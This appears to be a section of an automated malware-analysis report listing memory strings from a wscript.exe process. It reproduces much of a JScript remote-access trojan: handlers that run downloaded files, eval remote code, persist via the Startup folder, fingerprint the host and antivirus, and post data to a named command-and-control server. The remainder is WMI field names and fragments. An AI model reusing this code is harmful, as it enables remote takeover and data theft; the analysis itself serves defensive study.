Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.quit(1);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "sc") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s2 = ex("temp") + "\\" + p[2];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fi = fs.createtextfile(s2,true);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fi.write(p[1]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fi.close();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run(s2);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "ex") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval(p[1]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "rn") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ri = fs.opentextfile(fu,1);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fr = ri.readall();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ri.close();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vn = vn.split("_");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fr = fr.replace(vn[0],p[1]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wi = fs.opentextfile(fu,2,false);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wi.write(fr);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wi.close();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run("wscript.exe //b \"" + fu + "\"");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "up") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ctf = fs.createtextfile(s2,true);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var gu = p[1];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gu = gu.replace("|u|","|v|");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctf.write(gu);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctf.close();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run("wscript.exe //b \"" + s2 + "\"",6);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "un") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s2 = p[1];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var vdr = fu;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var regi = "nothing!";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%rgne%",regi);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval(s2);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "rf") {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.sleep(7000);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } while (true) ;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ex(s) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return sh.expandenvironmentstrings("%" + s + "%");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function pt(c,a) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var x = cr(3);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.open('post','http://javaautorun.duia.ro:5465/' + c, false);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.setrequestheader("user-agent:",nf());
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.send(a);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return x.responsetext;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function nf() {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s,nt,i;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (fs.fileexists(ex("windir") + "\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt ="yes";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt = "no";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = vn + ch + ex("computername") + ch + ex("username") + ch + ob(2) + ch + ob(4) + ch + ch + nt + ch + u + ch;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return s;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function cr(n) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return new activexobject(j[n]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ob(n) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n == 2) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(y[0]).instancesof(y[2]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var en = new enumerator(s);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for (; !en.atend();en.movenext()) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var it = en.item();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.caption;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: break;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n == 4) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(wmg).instancesof(y[3]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var str = it.displayname;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (str !== '') {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wmg = wmg + "2";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: en = new enumerator(s);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: it = en.item();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.displayname;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n==6) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(y[0]).instancesof(y[1]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.volumeserialnumber;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ns() {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: try {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ap = cr(2);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fs.copyfile(fu, ap.namespace(7).self.path + "\\" + wn,true);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } catch(err) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \jdkn7
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: c:\windows\systep
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: kernelbao
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: wmapi.d
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: local\sm
Source: wscript.exe, 00000001.00000002.816780509.00000083BC7FD000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: wsh-timer
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f6dee
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f)edd
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: aqd!
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 7add"
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "crd(
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +ckd)
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0c@d*
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f`l+e
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fnle
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f_lve
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fcm*d
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f^myd
Source: wscript.exe, 00000001.00000003.312195705.00000228B2850000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \ovd$
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: root\cimv2
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1root\cimv2:
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: not_null
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: timestamp
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: it32not_nulltimestamp
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: string
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antivirusproduct
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: windows defender
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {d68ddc3a-831f-4fae-9e44-da132c1acf46}
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: windowsdefender://
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %programfiles%\windows defender\msmpeng.exe
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: thu, 27 jun 2019 08:28:49 gmt
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antivirusproductwindows defender{d68ddc3a-831f-4fae-9e44-da132c1acf46}windowsdefender://%programfiles%\windows defender\msmpeng.exethu, 27 jun 2019 08:28:49 gmt
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rpcrt4.dll+0xdde1d
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: countrycode
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcountrycode
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: creationclassname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcreationclassname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cscreationclassname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcscreationclassname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: csdversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcsdversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: csname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcsname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: currenttimezone
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringcurrenttimezone
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sint16
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dataexecutionprevention_32bitapplications
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sint16dataexecutionprevention_32bitapplications
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: boolean
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dataexecutionprevention_available
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleandataexecutionprevention_available
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dataexecutionprevention_drivers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleandataexecutionprevention_drivers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dataexecutionprevention_supportpolicy
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleandataexecutionprevention_supportpolicy
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint8
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: debug
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint8debug
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: description
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleandescription
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: distributed
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringdistributed
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: encryptionlevel
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanencryptionlevel
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: foregroundapplicationboost
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32foregroundapplicationboost
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: freephysicalmemory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint8freephysicalmemory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: freespaceinpagingfiles
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64freespaceinpagingfiles
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: freevirtualmemory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64freevirtualmemory
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: installdate
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64installdatee
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: datetime
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: largesystemcache
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: datetimelargesystemcache
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lastbootuptime
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32lastbootuptimee
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: localdatetime
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: datetimelocaldatetimee
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: locale
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: datetimelocale
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: manufacturer
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringmanufacturer
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: maxnumberofprocesses
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringmaxnumberofprocesses
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: maxprocessmemorysize
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32maxprocessmemorysize
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: muilanguages
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint64muilanguages
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringname
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberoflicensedusers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringnumberoflicensedusers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofprocesses
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32numberofprocesses
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofusers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32numberofusers
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: operatingsystemsku
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32operatingsystemsku
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: organization
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32organization
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: osarchitecture
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringosarchitecture
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: oslanguage
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringoslanguage
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: osproductsuite
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32osproductsuite
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ostype
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8uint32ostype
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint16
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: othertypedescription
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: guint16othertypedescription
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: paeenabled
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringpaeenabled
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: plusproductid
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanplusproductid
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: plusversionnumber
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringplusversionnumber
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: portableoperatingsystem
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringportableoperatingsystem
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: primary
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanprimary
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: producttype
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: booleanproducttype
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: registereduser
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint32registereduser
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: serialnumber
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringserialnumber
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: servicepackmajorversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringservicepackmajorversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: servicepackminorversion
Source: wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: uint16servicepackminorversion
